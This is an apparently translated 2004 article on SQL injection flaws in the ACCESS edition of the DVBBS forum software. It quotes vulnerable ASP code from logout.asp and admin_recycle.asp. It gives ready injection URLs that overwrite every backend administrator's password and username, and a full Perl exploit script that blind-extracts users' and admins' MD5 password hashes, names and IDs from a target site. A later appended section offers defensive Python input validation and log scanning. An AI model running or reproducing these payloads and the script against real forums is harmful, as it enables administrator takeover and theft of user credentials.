

The Smile Behind the Absolute: Another Look at DVBBS Vulnerabilities

2004-9-29 20:05 | Submitted by: security

Envymask's sharp thinking helped me solve many problems; brother or not, I still owe him a thank-you. I was quite surprised to see the security patch DVBBS released: someone had evidently alerted the author to a class of vulnerabilities in the program. The author clearly went over DVBBS thoroughly, and while eliminating that class of bug also closed several other security holes along the way. Seeing the "fruits of my labour", which had cost me hours, fixed by the author left me a little sour.

Some people and articles mistakenly believe that even if 动网 (DVBBS) has vulnerabilities, only the MSSQL edition is really at risk, while the ACCESS edition's MD5-hashed user credentials and the SESSION+COOKIE authentication on the admin backend make it unbreakable: "At most you get the MD5-hashed password; what can you do with that?", "All we have is brute force", "DVBBS is already a very secure program"... On one dejected morning I happened upon this dear friend, standing quietly behind the absolute, smiling... So this article shows how to break the "supposedly secure" ACCESS edition of DVBBS; exploiting the MSSQL edition is simple and dull, so I decline to cover it. Also, anyone affected: patch promptly.

The attack has two steps: first obtain the administrator's MD5-hashed credentials, then use them to change the backend administrator's password.

1. Obtaining any user's MD5-hashed credentials

The SQL injection flaws in a whole batch of files (logout.asp, messanger.asp, myfile.asp, ...) serve this purpose. Of these, logout.asp struck me as slightly novel, so I'll use it to illustrate the problem.

logout.asp:
/--------------------------------------------------------------------------
<%
    dim activeuser
    membername=request.cookies("aspsky")("username")
    if session("userid")<>"" then
        activeuser="delete from online where id="&session("userid")
        Conn.Execute activeuser
    end if
    if membername<>"" then
        activeuser="delete from online where username='"&membername&"'"
        Conn.Execute activeuser
    end if
    Response.Cookies("aspsky").path=cookiepath
    Response.Cookies("aspsky")("username")=""
    Response.Cookies("aspsky")("password")=""
    Response.Cookies("aspsky")("userclass")=""
    Response.Cookies("aspsky")("userid")=""
    Response.Cookies("aspsky")("userhidden")=""
    Response.Cookies("aspsky")("usercookies")=""
    session("userid")=""
    conn.close
    set conn=nothing
    response.redirect("index.asp")
%>
/--------------------------------------------------------------------------

The problematic statement:
    activeuser="delete from online where username='"&membername&"'"

Many people will ask: this can be exploited? It can! Steps:
1: Register a user and log in.
2: Craft membername in the COOKIE and request logout.asp, so that the SQL statement the program executes contains the sub-clause we appended through a logical condition.
3: Craft the parameters and request the main page; if the returned page contains the registered username, repeat step 2.
4: Obtain the sensitive information.
The test program is attached at the end.

2. Breaking into the admin backend

We now have the administrator's MD5-hashed credentials, and with cookie spoofing we can perform administrator operations on the front end. If you still insist on brute force and find it interesting, you can stop reading here. Brute force deserves contempt: not that it is unrealistic, just that it is tedious.

admin_recycle.asp
/--------------------------------------------------------------------------
...
topicid=request("topicid")
if request("action")<>"清空回收站" then
    if topicid="" or isnull(topicid) then
        Errmsg=Errmsg+""+"请选择相关帖子后进行操作。"
        Founderr=true
    end if
end if
if request("tablename")="topic" then
    tablename="topic"
elseif instr(request("tablename"),"bbs")>0 then
    tablename=request("tablename")
else
    Errmsg=Errmsg+""+"错误的系统参数!"
    Founderr=true
end if
if not master then
    Errmsg=Errmsg+""+"您不是系统管理员或者您还没有登陆。"
    Founderr=true
end if
...
'restore recycle-bin contents
sub redel()
dim tempnum,todaynum
if instr(tablename,"bbs")>0 then
    sql="update "&tablename&" set locktopic=0 where Announceid in ("&TopicID&")"
    conn.execute(sql)
...
/--------------------------------------------------------------------------

Problems:
1: No SESSION authentication is used.
2: topicid is not filtered.
3: tablename is only required to contain "bbs", with no other filtering at all (still unfixed at the time of writing).
tablename and TopicID echo each other; a match made in heaven.

Submitting
http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20id%20in%20(9&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs
actually executes
update admin set [password]='ef7813118e77b0ee', lastloginip='bbs set locktopic=0 where Announceid in (' where id in (9)
so the password of the backend administrator with ID 9 is changed to ilikecat (ef7813118e77b0ee). After submitting the URL above, the page returns an error. That is because the trailing SQL has a syntax error; ignore it, the statement we wanted has already executed "correctly" before it. Note: front-end administrators and backend administrators correspond one to one; get it wrong and you cannot log in to the backend.

To save effort, you can use:
http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20(1=1&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs
which changes every backend administrator's password to ilikecat (ef7813118e77b0ee), and
http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20(1=1&tablename=admin%20set%20username='catlikeme',lastloginip='bbs
which changes every backend administrator's username to catlikeme. Of course, it is best not to be so bored as to change every registered user's account and password as well. OK, after some work on the local COOKIE, kindly log in to the backend as catlikeme/ilikecat and do some "administration".

/--------------------[Test program for obtaining any user's MD5-hashed credentials:
#!/usr/bin/perl
#Codz By PsKey
#Exploit of DVBBS's logout.asp
#--------------------------------------------------------------------------
#  This script is written against the logout.asp defect in the DVBBS (动网) forum and
#  can derive every user's MD5-hashed password; it can also automatically crack the
#  backend administrators' ID, username and password.
#  It follows the latest version; if it fails on an older version, adapt it yourself.
#  How to use:
#  1: Register a user on the target forum as ilikecat/catlikeme and note that user's userid
#  2: Register another arbitrary user (this step is required)
#  3: Run the script and supply the parameters as the help describes
#  If it is the MSSQL edition, throw this lousy script aside
#--------------------------------------------------------------------------
$|=1;
use Socket;
use Getopt::Std;
getopt('hpwium');
print "\n             ===================================================\n";
print "                       Exploit of DVBBS's logout.asp\n";
print "                     Codz By PsKey     \n";
print "                       www.isgrey.com && c4st.51.net              \n";
print "                       Thanx Envymask            \n";
print "             ===================================================\n";
&usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));
$host=$opt_h;
$port=$opt_p||80;
$path=$opt_w;
$userid=$opt_i;
$user=$opt_u;
$mode=$opt_m;
if ($opt_m eq "p") {
  &usage unless defined($opt_u);
  print "\nPlease wait...\n\n";
  # one hex character of the 16-character password per pass
  for ($j=1;$j<=16;$j++) {
    @dic1=(0..9);
    @dic2=(a..f);
    @dic=(@dic1,@dic2);
    &first;
    for ($i=0;$i<=$#dic;$i++) {
      print "$dic[$i]";
      $key=$pws.$dic[$i];
      $target = "ilikecat'%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName='$user'%20and%20left(UserPassword,$j)='$key')%20and%20'1'='1";
      &second;
      if ("@in" !~ /ilikecat/)  {
        $th=$j.th;
        print "\n\/\/------------The $th word of the password is $dic[$i]";
        $pws=$pws.$dic[$i];
        last;
      }
    }
  }
  print "\n\nSuccessful,the full password of $user is $pws.\n";
}
elsif ($opt_m eq "b") {
  #Crack ID
  print "\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admin's id...";
  &first;
  for ($i=0;$i<=MAX_ADMIN_ID;$i++) {   # upper bound lost in extraction; MAX_ADMIN_ID is a placeholder
    $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%20'1'='1";
    &second;
    if ("@in" !~ /ilikecat/)  {
      print "\n--------->>There is one admin's id $i";
      push (@id,$i);
      &first;
    }
  }
  print "\n\#\#\#\#\#\#\#\#\#\#\#End cracking admin's id...\n";
  sleep(2);
  #Crack the length of admin's username
  print "\n\#\#\#\#\#\#\#\#\#\#\#Start Cracking the length of admin's username...\n";
  for ($j=0;$j<=$#id;$j++) {
    print "  \|\-\>cracking username's length which id is $id[$j] ...";
    &first;
    for ($i=0;$i<=MAX_NAME_LEN;$i++) {   # upper bound lost in extraction; MAX_NAME_LEN is a placeholder
      $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%20'1'='1";
      &second;
      if ("@in" !~ /ilikecat/)  {
        print "\n--------->>The length of $id[$j] is $i";
        push (@len,$i);
        &first;
        last;
      }
    }
  }
  print "\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admin's username...\n";
  sleep(2);
  #Crack admin's username
  print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's username...\n";
  @dic1=(0..9);
  @dic2=(a..z);
  @dic=(@dic1,@dic2);
  for ($j=0;$j<=$#id;$j++) {
    $pws="";
    print "  \|\-\>cracking username which id is $id[$j] ...";
    OUTER: for ($k=1;$k<=$len[$j];$k++) {
      &first;
      USERNAME: for ($i=0;$i<=$#dic;$i++) {
        print "$dic[$i].";
        $key=$pws.$dic[$i];
        $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)='$key')%20and%20'1'='1";
        &second;
        if ("@in" !~ /ilikecat/)  {
          $th=$k.th;
          print "\n--------->>The $th word of $id[$j] username is $dic[$i]";
          $pws=$pws.$dic[$i];
          last USERNAME;
        }
        if ($dic[$i] eq "z") {
          print "\ni can't crack this admin's name,maybe it is chinese.\n";
          $pws="\?";   # placeholder name; pushed once below so @user stays aligned with @id
          last OUTER;
        }
      }
    }
    push (@user,$pws);
    print "\n========>>The username is $pws which id is $id[$j]\n";
  }
  print "\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's username...\n";
  sleep(2);
  #Crack admin's password
  print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's password...\n";
  @dic1=(0..9);
  @dic2=(a..f);
  @dic=(@dic1,@dic2);
  for ($j=0;$j<=$#id;$j++) {
    $pws="";
    print "  \|\-\>cracking password which id is $id[$j] ...";
    for ($k=1;$k<=16;$k++) {
      &first;
      PASSWORD: for ($i=0;$i<=$#dic;$i++) {
        print "$dic[$i].";
        $key=$pws.$dic[$i];
        $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)='$key')%20and%20'1'='1";
        &second;
        if ("@in" !~ /ilikecat/)  {
          $th=$k.th;
          print "\n--------->>The $th word of $id[$j] password is $dic[$i]";
          $pws=$pws.$dic[$i];
          last PASSWORD;
        }
      }
    }
    push (@pass,$pws);
    print "\n\n========>>The password is $pws which id is $id[$j]\n\n";
  }
  print "\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's password...\n\n";
  print "We got them now:\n";
  printf("%-4s %-20s %-16s\n",ID,UserName,PassWord);
  for ($i=0;$i<=$#id;$i++) {
    printf("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]);
  }
}
else {
  &usage;
}
sub first {
  $str="username=ilikecat&password=catlikeme&CookieDate=1";
  $len=length($str);
  $req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n".
         "Referer: http://$host$path/login.asp\n".
         "Host: $host\n".
         "Content-Length: $len\n".
         "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n".
         "\n".
         "$str\n\n";
  print "\n.";
  sendraw($req);
  $req0 = "GET $path/index.asp HTTP/1.0\n".
          "Referer: http://$host$path/index.asp\n".
          "Host: $host\n".
          "Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
  print ".\n";
  sendraw($req0);
}
sub second {
  $req1 = "GET $path/logout.asp HTTP/1.0\n".
          "Host: $host\n".
          "Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n";
  print ".";
  @res = sendraw($req1);
  $req2 = "GET $path/index.asp?action=show HTTP/1.0\n".
          "Referer: http://$host$path/index.asp?action=show \n".
          "Host: $host\n".
          "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
  print ".";
  @in = sendraw($req2);
}
sub usage {
print qq~
Usage: $0 -h <host> [-p <port>] -w <path> -i <userid> -m <b|p> [-u <user>]
    -h <host>   =hostname you want to attack
    -p <port>   =port,80 default
    -w <path>   =the web path such as "/dvbbs"
    -i <userid> =the userid of ilikecat
    -m <b|p>    =only two choice,b and p(This option need -u)
    -u <user>   =the user you want to crack
Eg: 1.Crack proscenium
      $0 -h www.target.com -p 80 -w /dvbbs -i 2 -m p -u admin
    2.Crack background
      $0 -h www.target.com -p 80 -w /dvbbs -i 2 -m b
~;
exit;
}
sub sendraw {
  my ($req) = @_;
  my $target;
  $target = inet_aton($host) || die("inet_aton problems\n");
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
  if(connect(S,pack "SnA4x8",2,$port,$target)){
    select(S);
    $| = 1;
    print $req;
    my @res = <S>;
    select(STDOUT);
    close(S);
    return @res;
  }
  else {
    die("Can't connect...\n");
  }
}
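As an added defensive example, not from the original article or the DVBBS project: the three problems listed for admin_recycle.asp and the unvalidated cookie username in logout.asp all come down to missing input validation. The Python below applies the allowlists the article says are absent (replacing the instr(tablename,"bbs")>0 check) and runs them over constructed access-log lines to flag requests that fail; the post-table naming pattern (topic or bbsN) and the username charset are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the page); the second line
# reproduces the admin_recycle.asp request shape the article describes.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Sep/2004:20:05:01 +0800] "GET /d6/admin_recycle.asp?action=restore&topicid=12,15&tablename=bbs3 HTTP/1.0" 200 512
10.0.0.9 - - [29/Sep/2004:20:05:07 +0800] "GET /d6/admin_recycle.asp?action=restore&topicid=%27%20where%20(1%3D1&tablename=admin%20set%20%5Bpassword%5D%3D%27x%27%2Clastloginip%3D%27bbs HTTP/1.0" 500 233
10.0.0.9 - - [29/Sep/2004:20:05:09 +0800] "GET /d6/index.asp HTTP/1.0" 200 8812
"""

# Allowlists the article says admin_recycle.asp lacks: topicid must be a
# comma-separated list of integer ids; tablename must be a real post table
# (assumed here to be "topic" or "bbs" followed by digits).
TOPICID_RE = re.compile(r"^\d+(,\d+)*$")
TABLENAME_RE = re.compile(r"^(topic|bbs\d+)$")
# Assumed registration charset for the username in the aspsky cookie (logout.asp).
USERNAME_RE = re.compile(r"^\w{1,20}$")

def validate_recycle_params(query):
    """Return the reasons an admin_recycle.asp query string is unsafe ([] = ok)."""
    params = parse_qs(query, keep_blank_values=True)
    reasons = []
    if not TOPICID_RE.match(params.get("topicid", [""])[0]):
        reasons.append("topicid is not a comma-separated integer list")
    if not TABLENAME_RE.match(params.get("tablename", [""])[0]):
        reasons.append("tablename is not an allowlisted post table")
    return reasons

def username_is_clean(name):
    """True if a cookie username could have come from normal registration."""
    return bool(USERNAME_RE.match(name))

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')
def flag_recycle_requests(log_text):
    """Return (client, status, reasons) for admin_recycle.asp hits failing validation."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/admin_recycle.asp"):
            continue
        reasons = validate_recycle_params(parts.query)
        if reasons:
            hits.append((client, int(status), reasons))
    return hits
```

A value such as bbsadmin passes the original contains-"bbs" test but fails the allowlist, which is the difference the article's third point is about.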
